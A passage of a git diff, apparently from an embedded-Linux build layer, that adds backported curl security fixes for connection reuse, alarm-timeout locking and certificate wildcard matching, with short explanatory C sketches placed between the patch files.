++ struct ftp_conn *ftpc = &conn->proto.ftpc;
+
+- conn->data->req.protop = ftp = calloc(sizeof(struct FTP), 1);
++ ftp = calloc(sizeof(struct FTP), 1);
+ if(NULL == ftp)
+ return CURLE_OUT_OF_MEMORY;
+
++ /* clone connection related data that is FTP specific */
++ if(data->set.str[STRING_FTP_ACCOUNT]) {
++ ftpc->account = strdup(data->set.str[STRING_FTP_ACCOUNT]);
++ if(!ftpc->account) {
++ free(ftp);
++ return CURLE_OUT_OF_MEMORY;
++ }
++ }
++ if(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]) {
++ ftpc->alternative_to_user =
++ strdup(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]);
++ if(!ftpc->alternative_to_user) {
++ Curl_safefree(ftpc->account);
++ free(ftp);
++ return CURLE_OUT_OF_MEMORY;
++ }
++ }
++ conn->data->req.protop = ftp;
++
+ ftp->path = &data->state.up.path[1]; /* don't include the initial slash */
+
+ /* FTP URLs support an extension like ";type=<typecode>" that
+@@ -4366,7 +4390,9 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
+ /* get some initial data into the ftp struct */
+ ftp->transfer = FTPTRANSFER_BODY;
+ ftp->downloadsize = 0;
+- conn->proto.ftpc.known_filesize = -1; /* unknown size for now */
++ ftpc->known_filesize = -1; /* unknown size for now */
++ ftpc->use_ssl = data->set.use_ssl;
++ ftpc->ccc = data->set.ftp_ccc;
+
+ return CURLE_OK;
+ }
+diff --git a/lib/ftp.h b/lib/ftp.h
+index 984347f..163dcb3 100644
+--- a/lib/ftp.h
++++ b/lib/ftp.h
+@@ -116,6 +116,8 @@ struct FTP {
+ struct */
+ struct ftp_conn {
+ struct pingpong pp;
++ char *account;
++ char *alternative_to_user;
+ char *entrypath; /* the PWD reply when we logged on */
+ char **dirs; /* realloc()ed array for path components */
+ int dirdepth; /* number of entries used in the 'dirs' array */
+@@ -141,6 +143,9 @@ struct ftp_conn {
+ ftpstate state; /* always use ftp.c:state() to change state! */
+ ftpstate state_saved; /* transfer type saved to be reloaded after
+ data connection is established */
++ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
++ IMAP or POP3 or others! (type: curl_usessl)*/
++ unsigned char ccc; /* ccc level for this connection */
+ curl_off_t retr_size_saved; /* Size of retrieved file saved */
+ char *server_os; /* The target server operating system. */
+ curl_off_t known_filesize; /* file size is different from -1, if wildcard
+diff --git a/lib/setopt.c b/lib/setopt.c
+index 4d96f6b..a91bb70 100644
+--- a/lib/setopt.c
++++ b/lib/setopt.c
+@@ -2126,7 +2126,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
+ arg = va_arg(param, long);
+ if((arg < CURLUSESSL_NONE) || (arg >= CURLUSESSL_LAST))
+ return CURLE_BAD_FUNCTION_ARGUMENT;
+- data->set.use_ssl = (curl_usessl)arg;
++ data->set.use_ssl = (unsigned char)arg;
+ break;
+
+ case CURLOPT_SSL_OPTIONS:
+diff --git a/lib/url.c b/lib/url.c
+index dfbde3b..f84375c 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,10 +1257,24 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
+- if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
++#ifdef USE_SSH
++ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+ continue;
+ }
++#endif
++#ifndef CURL_DISABLE_FTP
++ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_FTP) {
++ /* Also match ACCOUNT, ALTERNATIVE-TO-USER, USE_SSL and CCC options */
++ if(Curl_timestrcmp(needle->proto.ftpc.account,
++ check->proto.ftpc.account) ||
++ Curl_timestrcmp(needle->proto.ftpc.alternative_to_user,
++ check->proto.ftpc.alternative_to_user) ||
++ (needle->proto.ftpc.use_ssl != check->proto.ftpc.use_ssl) ||
++ (needle->proto.ftpc.ccc != check->proto.ftpc.ccc))
++ continue;
++ }
++#endif
+
+ if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
+ needle->bits.tunnel_proxy) {
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 168f874..51b793b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1730,8 +1730,6 @@ struct UserDefined {
+ void *ssh_keyfunc_userp; /* custom pointer to callback */
+ enum CURL_NETRC_OPTION
+ use_netrc; /* defined in include/curl.h */
+- curl_usessl use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
+- IMAP or POP3 or others! */
+ long new_file_perms; /* Permissions to use when creating remote files */
+ long new_directory_perms; /* Permissions to use when creating remote dirs */
+ long ssh_auth_types; /* allowed SSH auth types */
+@@ -1851,6 +1849,8 @@ struct UserDefined {
+ BIT(http09_allowed); /* allow HTTP/0.9 responses */
+ BIT(mail_rcpt_allowfails); /* allow RCPT TO command to fail for some
+ recipients */
++ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
++ IMAP or POP3 or others! (type: curl_usessl)*/
+ };
+
+ struct Names {
+--
+2.25.1
+
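
Condensed, the reuse rule this patch adds is: an existing FTP connection is only a candidate for reuse when the account, the alternative user, the TLS upgrade level and the CCC setting all match the new request. A standalone sketch of that rule (struct and helper names are invented; curl's version sits inline in ConnectionExists() and uses Curl_timestrcmp()):

    #include <stdbool.h>
    #include <string.h>

    struct ftp_opts {              /* illustrative stand-in for the ftp_conn fields */
      const char *account;
      const char *alternative_to_user;
      unsigned char use_ssl;
      unsigned char ccc;
    };

    static bool str_eq(const char *a, const char *b)
    {
      if(!a || !b)
        return a == b;             /* both unset counts as a match */
      return strcmp(a, b) == 0;
    }

    static bool ftp_reuse_ok(const struct ftp_opts *want, const struct ftp_opts *have)
    {
      return str_eq(want->account, have->account) &&
             str_eq(want->alternative_to_user, have->alternative_to_user) &&
             want->use_ssl == have->use_ssl &&
             want->ccc == have->ccc;
    }
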
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27536.patch b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
new file mode 100644
index 0000000000..b04a77de25
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
@@ -0,0 +1,55 @@
+From cb49e67303dbafbab1cebf4086e3ec15b7d56ee5 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 09:22:43 +0100
+Subject: [PATCH] url: only reuse connections with same GSS delegation
+
+Reported-by: Harry Sintonen
+Closes #10731
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/cb49e67303dbafbab1cebf4086e3ec15b7d56ee5]
+CVE: CVE-2023-27536
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/url.c | 6 ++++++
+ lib/urldata.h | 1 +
+ 2 files changed, 7 insertions(+)
+
+diff --git a/lib/url.c b/lib/url.c
+index f84375c..87f4eb0 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1257,6 +1257,11 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
++ /* GSS delegation differences do not actually affect every connection
++ and auth method, but this check takes precaution before efficiency */
++ if(needle->gssapi_delegation != check->gssapi_delegation)
++ continue;
++
+ #ifdef USE_SSH
+ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+@@ -1708,6 +1713,7 @@ static struct connectdata *allocate_conn(struct Curl_easy *data)
+ conn->fclosesocket = data->set.fclosesocket;
+ conn->closesocket_client = data->set.closesocket_client;
+ conn->lastused = Curl_now(); /* used now */
++ conn->gssapi_delegation = data->set.gssapi_delegation;
+
+ return conn;
+ error:
+diff --git a/lib/urldata.h b/lib/urldata.h
+index 51b793b..b8a611b 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -1118,6 +1118,7 @@ struct connectdata {
+ handle */
+ BIT(sock_accepted); /* TRUE if the SECONDARYSOCKET was created with
+ accept() */
++ long gssapi_delegation; /* inherited from set.gssapi_delegation */
+ };
+
+ /* The end of connectdata. */
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27538.patch b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
new file mode 100644
index 0000000000..6c40989d3b
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
@@ -0,0 +1,31 @@
+From af369db4d3833272b8ed443f7fcc2e757a0872eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Fri, 10 Mar 2023 08:22:51 +0100
+Subject: [PATCH] url: fix the SSH connection reuse check
+
+Reported-by: Harry Sintonen
+Closes #10735
+
+CVE: CVE-2023-27538
+Upstream-Status: Backport [https://github.com/curl/curl/commit/af369db4d3833272b8ed443f7fcc2e757a0872eb]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/url.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/url.c b/lib/url.c
+index 8da0245..9f14a7b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -1266,7 +1266,7 @@ ConnectionExists(struct Curl_easy *data,
+ }
+ }
+
+- if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
++ if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
+ if(!ssh_config_matches(needle, check))
+ continue;
+ }
+--
+2.25.1
+
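
The one-character fix above swaps an equality test for a bitwise one. PROTO_FAMILY_SSH is a bitmask covering more than one protocol, so testing for shared bits behaves differently from strict equality, and with equality the ssh_config_matches() check could be skipped entirely. A standalone illustration with made-up flag values (not curl's real constants):

    #include <stdio.h>

    #define PROTO_SCP  (1 << 0)   /* made-up values for illustration only */
    #define PROTO_SFTP (1 << 1)
    #define FAMILY_SSH (PROTO_SCP | PROTO_SFTP)

    int main(void)
    {
      unsigned int family = PROTO_SFTP;   /* value under test carries one bit */

      printf("'==' matches: %s\n", (family == FAMILY_SSH) ? "yes" : "no"); /* no  */
      printf("'&'  matches: %s\n", (family & FAMILY_SSH)  ? "yes" : "no"); /* yes */
      return 0;
    }
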
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
new file mode 100644
index 0000000000..eaa6fdc327
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
@@ -0,0 +1,197 @@
+From f446258f0269a62289cca0210157cb8558d0edc3 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 16 May 2023 23:40:42 +0200
+Subject: [PATCH] hostip: include easy_lock.h before using
+ GLOBAL_INIT_IS_THREADSAFE
+
+Since that header file is the only place that define can be defined.
+
+Reported-by: Marc Deslauriers
+
+Follow-up to 13718030ad4b3209
+
+Closes #11121
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/f446258f0269a62289cca0210157cb8558d0edc3]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/easy_lock.h | 109 ++++++++++++++++++++++++++++++++++++++++++++++++
+ lib/hostip.c | 10 ++---
+ lib/hostip.h | 9 ----
+ 3 files changed, 113 insertions(+), 15 deletions(-)
+ create mode 100644 lib/easy_lock.h
+
+diff --git a/lib/easy_lock.h b/lib/easy_lock.h
+new file mode 100644
+index 0000000..6399a39
+--- /dev/null
++++ b/lib/easy_lock.h
+@@ -0,0 +1,109 @@
++#ifndef HEADER_CURL_EASY_LOCK_H
++#define HEADER_CURL_EASY_LOCK_H
++/***************************************************************************
++ * _ _ ____ _
++ * Project ___| | | | _ \| |
++ * / __| | | | |_) | |
++ * | (__| |_| | _ <| |___
++ * \___|\___/|_| \_\_____|
++ *
++ * Copyright (C) Daniel Stenberg, <daniel@haxx.se>, et al.
++ *
++ * This software is licensed as described in the file COPYING, which
++ * you should have received as part of this distribution. The terms
++ * are also available at https://curl.se/docs/copyright.html.
++ *
++ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
++ * copies of the Software, and permit persons to whom the Software is
++ * furnished to do so, under the terms of the COPYING file.
++ *
++ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
++ * KIND, either express or implied.
++ *
++ * SPDX-License-Identifier: curl
++ *
++ ***************************************************************************/
++
++#include "curl_setup.h"
++
++#define GLOBAL_INIT_IS_THREADSAFE
++
++#if defined(_WIN32_WINNT) && _WIN32_WINNT >= 0x600
++
++#ifdef __MINGW32__
++#ifndef __MINGW64_VERSION_MAJOR
++#if (__MINGW32_MAJOR_VERSION < 5) || \
++ (__MINGW32_MAJOR_VERSION == 5 && __MINGW32_MINOR_VERSION == 0)
++/* mingw >= 5.0.1 defines SRWLOCK, and slightly different from MS define */
++typedef PVOID SRWLOCK, *PSRWLOCK;
++#endif
++#endif
++#ifndef SRWLOCK_INIT
++#define SRWLOCK_INIT NULL
++#endif
++#endif /* __MINGW32__ */
++
++#define curl_simple_lock SRWLOCK
++#define CURL_SIMPLE_LOCK_INIT SRWLOCK_INIT
++
++#define curl_simple_lock_lock(m) AcquireSRWLockExclusive(m)
++#define curl_simple_lock_unlock(m) ReleaseSRWLockExclusive(m)
++
++#elif defined(HAVE_ATOMIC) && defined(HAVE_STDATOMIC_H)
++#include <stdatomic.h>
++#if defined(HAVE_SCHED_YIELD)
++#include <sched.h>
++#endif
++
++#define curl_simple_lock atomic_int
++#define CURL_SIMPLE_LOCK_INIT 0
++
++/* a clang-thing */
++#ifndef __has_builtin
++#define __has_builtin(x) 0
++#endif
++
++#ifndef __INTEL_COMPILER
++/* The Intel compiler tries to look like GCC *and* clang *and* lies in its
++ __has_builtin() function, so override it. */
++
++/* if GCC on i386/x86_64 or if the built-in is present */
++#if ( (defined(__GNUC__) && !defined(__clang__)) && \
++ (defined(__i386__) || defined(__x86_64__))) || \
++ __has_builtin(__builtin_ia32_pause)
++#define HAVE_BUILTIN_IA32_PAUSE
++#endif
++
++#endif
++
++static inline void curl_simple_lock_lock(curl_simple_lock *lock)
++{
++ for(;;) {
++ if(!atomic_exchange_explicit(lock, true, memory_order_acquire))
++ break;
++ /* Reduce cache coherency traffic */
++ while(atomic_load_explicit(lock, memory_order_relaxed)) {
++ /* Reduce load (not mandatory) */
++#ifdef HAVE_BUILTIN_IA32_PAUSE
++ __builtin_ia32_pause();
++#elif defined(__aarch64__)
++ __asm__ volatile("yield" ::: "memory");
++#elif defined(HAVE_SCHED_YIELD)
++ sched_yield();
++#endif
++ }
++ }
++}
++
++static inline void curl_simple_lock_unlock(curl_simple_lock *lock)
++{
++ atomic_store_explicit(lock, false, memory_order_release);
++}
++
++#else
++
++#undef GLOBAL_INIT_IS_THREADSAFE
++
++#endif
++
++#endif /* HEADER_CURL_EASY_LOCK_H */
+diff --git a/lib/hostip.c b/lib/hostip.c
+index 5231a74..d5bf881 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,6 +68,8 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+
++#include "easy_lock.h"
++
+ #if defined(CURLRES_SYNCH) && \
+ defined(HAVE_ALARM) && \
+ defined(SIGALRM) && \
+@@ -77,10 +79,6 @@
+ #define USE_ALARM_TIMEOUT
+ #endif
+
+-#ifdef USE_ALARM_TIMEOUT
+-#include "easy_lock.h"
+-#endif
+-
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+
+ /*
+@@ -259,8 +257,8 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+ /* Beware this is a global and unique instance. This is used to store the
+ return address that we can jump back to from inside a signal handler. This
+ is not thread-safe stuff. */
+-sigjmp_buf curl_jmpenv;
+-curl_simple_lock curl_jmpenv_lock;
++static sigjmp_buf curl_jmpenv;
++static curl_simple_lock curl_jmpenv_lock;
+ #endif
+
+ /* lookup address, returns entry if found and not stale */
+diff --git a/lib/hostip.h b/lib/hostip.h
+index baf1e58..d7f73d9 100644
+--- a/lib/hostip.h
++++ b/lib/hostip.h
+@@ -196,15 +196,6 @@ Curl_cache_addr(struct Curl_easy *data, Curl_addrinfo *addr,
+ #define CURL_INADDR_NONE INADDR_NONE
+ #endif
+
+-#ifdef HAVE_SIGSETJMP
+-/* Forward-declaration of variable defined in hostip.c. Beware this
+- * is a global and unique instance. This is used to store the return
+- * address that we can jump back to from inside a signal handler.
+- * This is not thread-safe stuff.
+- */
+-extern sigjmp_buf curl_jmpenv;
+-#endif
+-
+ /*
+ * Function provided by the resolver backend to set DNS servers to use.
+ */
+--
+2.25.1
+
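
The new easy_lock.h builds a tiny spin lock out of C11 atomics when an SRWLOCK is not available. A standalone, compilable sketch of the same acquire/spin/release pattern (build with -std=c11; the pause/yield hints from the real header are omitted):

    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdio.h>

    static atomic_int simple_lock_var = 0;

    static void simple_lock(atomic_int *l)
    {
      for(;;) {
        if(!atomic_exchange_explicit(l, true, memory_order_acquire))
          break;                                     /* got the lock */
        while(atomic_load_explicit(l, memory_order_relaxed))
          ;                                          /* spin cheaply until it looks free */
      }
    }

    static void simple_unlock(atomic_int *l)
    {
      atomic_store_explicit(l, false, memory_order_release);
    }

    int main(void)
    {
      simple_lock(&simple_lock_var);
      puts("critical section");
      simple_unlock(&simple_lock_var);
      return 0;
    }
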
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320.patch b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
new file mode 100644
index 0000000000..0c9b67440a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
@@ -0,0 +1,86 @@
+From 13718030ad4b3209a7583b4f27f683cd3a6fa5f2 Mon Sep 17 00:00:00 2001
+From: Harry Sintonen <sintonen@iki.fi>
+Date: Tue, 25 Apr 2023 09:22:26 +0200
+Subject: [PATCH] hostip: add locks around use of global buffer for alarm()
+
+When building with the sync name resolver and timeout ability we now
+require thread-safety to be present to enable it.
+
+Closes #11030
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/13718030ad4b3209a7583b4f27f683cd3a6fa5f2]
+CVE: CVE-2023-28320
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/hostip.c | 19 +++++++++++++++----
+ 1 file changed, 15 insertions(+), 4 deletions(-)
+
+diff --git a/lib/hostip.c b/lib/hostip.c
+index f5bb634..5231a74 100644
+--- a/lib/hostip.c
++++ b/lib/hostip.c
+@@ -68,12 +68,19 @@
+ #include "curl_memory.h"
+ #include "memdebug.h"
+
+-#if defined(CURLRES_SYNCH) && \
+- defined(HAVE_ALARM) && defined(SIGALRM) && defined(HAVE_SIGSETJMP)
++#if defined(CURLRES_SYNCH) && \
++ defined(HAVE_ALARM) && \
++ defined(SIGALRM) && \
++ defined(HAVE_SIGSETJMP) && \
++ defined(GLOBAL_INIT_IS_THREADSAFE)
+ /* alarm-based timeouts can only be used with all the dependencies satisfied */
+ #define USE_ALARM_TIMEOUT
+ #endif
+
++#ifdef USE_ALARM_TIMEOUT
++#include "easy_lock.h"
++#endif
++
+ #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
+
+ /*
+@@ -248,11 +255,12 @@ void Curl_hostcache_prune(struct Curl_easy *data)
+ Curl_share_unlock(data, CURL_LOCK_DATA_DNS);
+ }
+
+-#ifdef HAVE_SIGSETJMP
++#ifdef USE_ALARM_TIMEOUT
+ /* Beware this is a global and unique instance. This is used to store the
+ return address that we can jump back to from inside a signal handler. This
+ is not thread-safe stuff. */
+ sigjmp_buf curl_jmpenv;
++curl_simple_lock curl_jmpenv_lock;
+ #endif
+
+ /* lookup address, returns entry if found and not stale */
+@@ -614,7 +622,6 @@ enum resolve_t Curl_resolv(struct connectdata *conn,
+ static
+ RETSIGTYPE alarmfunc(int sig)
+ {
+- /* this is for "-ansi -Wall -pedantic" to stop complaining! (rabe) */
+ (void)sig;
+ siglongjmp(curl_jmpenv, 1);
+ }
+@@ -695,6 +702,8 @@ enum resolve_t Curl_resolv_timeout(struct connectdata *conn,
+ This should be the last thing we do before calling Curl_resolv(),
+ as otherwise we'd have to worry about variables that get modified
+ before we invoke Curl_resolv() (and thus use "volatile"). */
++ curl_simple_lock_lock(&curl_jmpenv_lock);
++
+ if(sigsetjmp(curl_jmpenv, 1)) {
+ /* this is coming from a siglongjmp() after an alarm signal */
+ failf(data, "name lookup timed out");
+@@ -763,6 +772,8 @@ clean_up:
+ #endif
+ #endif /* HAVE_SIGACTION */
+
++ curl_simple_lock_unlock(&curl_jmpenv_lock);
++
+ /* switch back the alarm() to either zero or to what it was before minus
+ the time we spent until now! */
+ if(prev_alarm) {
+--
+2.25.1
+
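
The lock added above guards the pattern sketched below: one global sigjmp_buf shared with the SIGALRM handler, so only one resolve at a time may use the alarm()-based timeout path. A standalone, single-threaded sketch of that alarm()/siglongjmp() pattern, without the locking:

    #include <setjmp.h>
    #include <signal.h>
    #include <stdio.h>
    #include <unistd.h>

    static sigjmp_buf jmpenv;      /* one global buffer, hence the new lock in curl */

    static void alarmfunc(int sig)
    {
      (void)sig;
      siglongjmp(jmpenv, 1);
    }

    int main(void)
    {
      signal(SIGALRM, alarmfunc);
      if(sigsetjmp(jmpenv, 1)) {
        puts("name lookup timed out");
        return 1;
      }
      alarm(1);                    /* resolve time budget in seconds */
      sleep(5);                    /* stands in for a blocking resolver call */
      alarm(0);
      puts("finished in time");
      return 0;
    }
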
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28321.patch b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
new file mode 100644
index 0000000000..da1d1fdcd6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28321.patch
@@ -0,0 +1,272 @@
+Upstream-Status: Backport [import from ubuntu curl_7.68.0-1ubuntu2.20 with a
+minor change to the tests/data/test1397 part so the patch can be applied.
+upstream: https://github.com/curl/curl/commit/199f2d440d8659b42 ]
+CVE: CVE-2023-28321
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+This backport was obtained from SUSE.
+
+From 199f2d440d8659b42670c1b796220792b01a97bf Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 24 Apr 2023 21:07:02 +0200
+Subject: [PATCH] hostcheck: fix host name wildcard checking
+
+The leftmost "label" of the host name can now only match against single
+'*'. Like the browsers have worked for a long time.
+
+- extended unit test 1397 for this
+- move some SOURCE variables from unit/Makefile.am to unit/Makefile.inc
+
+Reported-by: Hiroki Kurosawa
+Closes #11018
+---
+ lib/hostcheck.c | 50 +++++++--------
+ tests/data/test1397 | 10 ++-
+ tests/unit/Makefile.am | 94 ----------------------------
+ tests/unit/Makefile.inc | 94 ++++++++++++++++++++++++++++
+ tests/unit/unit1397.c | 134 ++++++++++++++++++++++++----------------
+ 5 files changed, 202 insertions(+), 180 deletions(-)
+
+--- a/lib/hostcheck.c
++++ b/lib/hostcheck.c
+@@ -58,15 +58,19 @@
+ * apparent distinction between a name and an IP. We need to detect the use of
+ * an IP address and not wildcard match on such names.
+ *
++ * Only match on "*" being used for the leftmost label, not "a*", "a*b" nor
++ * "*b".
++ *
++ * @unittest: 1397
++ *
+ * NOTE: hostmatch() gets called with copied buffers so that it can modify the
+ * contents at will.
+ */
+
+ static int hostmatch(char *hostname, char *pattern)
+ {
+- const char *pattern_label_end, *pattern_wildcard, *hostname_label_end;
+- int wildcard_enabled;
+- size_t prefixlen, suffixlen;
++ const char *pattern_label_end, *hostname_label_end;
++ size_t suffixlen;
+ struct in_addr ignored;
+ #ifdef ENABLE_IPV6
+ struct sockaddr_in6 si6;
+@@ -80,13 +84,12 @@ static int hostmatch(char *hostname, cha
+ if(pattern[len-1]=='.')
+ pattern[len-1] = 0;
+
+- pattern_wildcard = strchr(pattern, '*');
+- if(pattern_wildcard == NULL)
++ if(strncmp(pattern, "*.", 2))
+ return strcasecompare(pattern, hostname) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+
+ /* detect IP address as hostname and fail the match if so */
+- if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
++ else if(Curl_inet_pton(AF_INET, hostname, &ignored) > 0)
+ return CURL_HOST_NOMATCH;
+ #ifdef ENABLE_IPV6
+ if(Curl_inet_pton(AF_INET6, hostname, &si6.sin6_addr) > 0)
+@@ -95,14 +98,9 @@ static int hostmatch(char *hostname, cha
+
+ /* We require at least 2 dots in pattern to avoid too wide wildcard
+ match. */
+- wildcard_enabled = 1;
+ pattern_label_end = strchr(pattern, '.');
+- if(pattern_label_end == NULL || strchr(pattern_label_end + 1, '.') == NULL ||
+- pattern_wildcard > pattern_label_end ||
+- strncasecompare(pattern, "xn--", 4)) {
+- wildcard_enabled = 0;
+- }
+- if(!wildcard_enabled)
++ if(pattern_label_end == NULL ||
++ strchr(pattern_label_end + 1, '.') == NULL)
+ return strcasecompare(pattern, hostname) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+
+@@ -117,11 +115,9 @@ static int hostmatch(char *hostname, cha
+ if(hostname_label_end - hostname < pattern_label_end - pattern)
+ return CURL_HOST_NOMATCH;
+
+- prefixlen = pattern_wildcard - pattern;
+- suffixlen = pattern_label_end - (pattern_wildcard + 1);
+- return strncasecompare(pattern, hostname, prefixlen) &&
+- strncasecompare(pattern_wildcard + 1, hostname_label_end - suffixlen,
+- suffixlen) ?
++ suffixlen = pattern_label_end - (pattern + 1);
++ return strncasecompare(pattern + 1, hostname_label_end - suffixlen,
++ suffixlen) ?
+ CURL_HOST_MATCH : CURL_HOST_NOMATCH;
+ }
+
+--- a/tests/data/test1397
++++ b/tests/data/test1397
+@@ -2,8 +2,7 @@
+ <info>
+ <keywords>
+ unittest
+-ssl
+-wildcard
++Curl_cert_hostcheck
+ </keywords>
+ </info>
+
+@@ -16,9 +15,8 @@ none
+ <features>
+ unittest
+ </features>
+- <name>
+-Check wildcard certificate matching function Curl_cert_hostcheck
+- </name>
++<name>
++Curl_cert_hostcheck unit tests
++</name>
+ </client>
+-
+ </testcase>
+--- a/tests/unit/unit1397.c
++++ b/tests/unit/unit1397.c
+@@ -21,8 +21,6 @@
+ ***************************************************************************/
+ #include "curlcheck.h"
+
+-#include "hostcheck.h" /* from the lib dir */
+-
+ static CURLcode unit_setup(void)
+ {
+ return CURLE_OK;
+@@ -30,50 +28,94 @@ static CURLcode unit_setup(void)
+
+ static void unit_stop(void)
+ {
+- /* done before shutting down and exiting */
+ }
+
+-UNITTEST_START
++/* only these backends define the tested functions */
++#if defined(USE_OPENSSL) || defined(USE_GSKIT) || \
++ defined(USE_SCHANNEL)
++#include "hostcheck.h"
++struct testcase {
++ const char *host;
++ const char *pattern;
++ bool match;
++};
++
++static struct testcase tests[] = {
++ {"", "", FALSE},
++ {"a", "", FALSE},
++ {"", "b", FALSE},
++ {"a", "b", FALSE},
++ {"aa", "bb", FALSE},
++ {"\xff", "\xff", TRUE},
++ {"aa.aa.aa", "aa.aa.bb", FALSE},
++ {"aa.aa.aa", "aa.aa.aa", TRUE},
++ {"aa.aa.aa", "*.aa.bb", FALSE},
++ {"aa.aa.aa", "*.aa.aa", TRUE},
++ {"192.168.0.1", "192.168.0.1", TRUE},
++ {"192.168.0.1", "*.168.0.1", FALSE},
++ {"192.168.0.1", "*.0.1", FALSE},
++ {"h.ello", "*.ello", FALSE},
++ {"h.ello.", "*.ello", FALSE},
++ {"h.ello", "*.ello.", FALSE},
++ {"h.e.llo", "*.e.llo", TRUE},
++ {"h.e.llo", " *.e.llo", FALSE},
++ {" h.e.llo", "*.e.llo", TRUE},
++ {"h.e.llo.", "*.e.llo", TRUE},
++ {"*.e.llo.", "*.e.llo", TRUE},
++ {"************.e.llo.", "*.e.llo", TRUE},
++ {"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
++ "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
++ "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
++ "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
++ "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
++ ".e.llo.", "*.e.llo", TRUE},
++ {"\xfe\xfe.e.llo.", "*.e.llo", TRUE},
++ {"h.e.llo.", "*.e.llo.", TRUE},
++ {"h.e.llo", "*.e.llo.", TRUE},
++ {".h.e.llo", "*.e.llo.", FALSE},
++ {"h.e.llo", "*.*.llo.", FALSE},
++ {"h.e.llo", "h.*.llo", FALSE},
++ {"h.e.llo", "h.e.*", FALSE},
++ {"hello", "*.ello", FALSE},
++ {"hello", "**llo", FALSE},
++ {"bar.foo.example.com", "*.example.com", FALSE},
++ {"foo.example.com", "*.example.com", TRUE},
++ {"baz.example.net", "b*z.example.net", FALSE},
++ {"foobaz.example.net", "*baz.example.net", FALSE},
++ {"xn--l8j.example.local", "x*.example.local", FALSE},
++ {"xn--l8j.example.net", "*.example.net", TRUE},
++ {"xn--l8j.example.net", "*j.example.net", FALSE},
++ {"xn--l8j.example.net", "xn--l8j.example.net", TRUE},
++ {"xn--l8j.example.net", "xn--l8j.*.net", FALSE},
++ {"xl8j.example.net", "*.example.net", TRUE},
++ {"fe80::3285:a9ff:fe46:b619", "*::3285:a9ff:fe46:b619", FALSE},
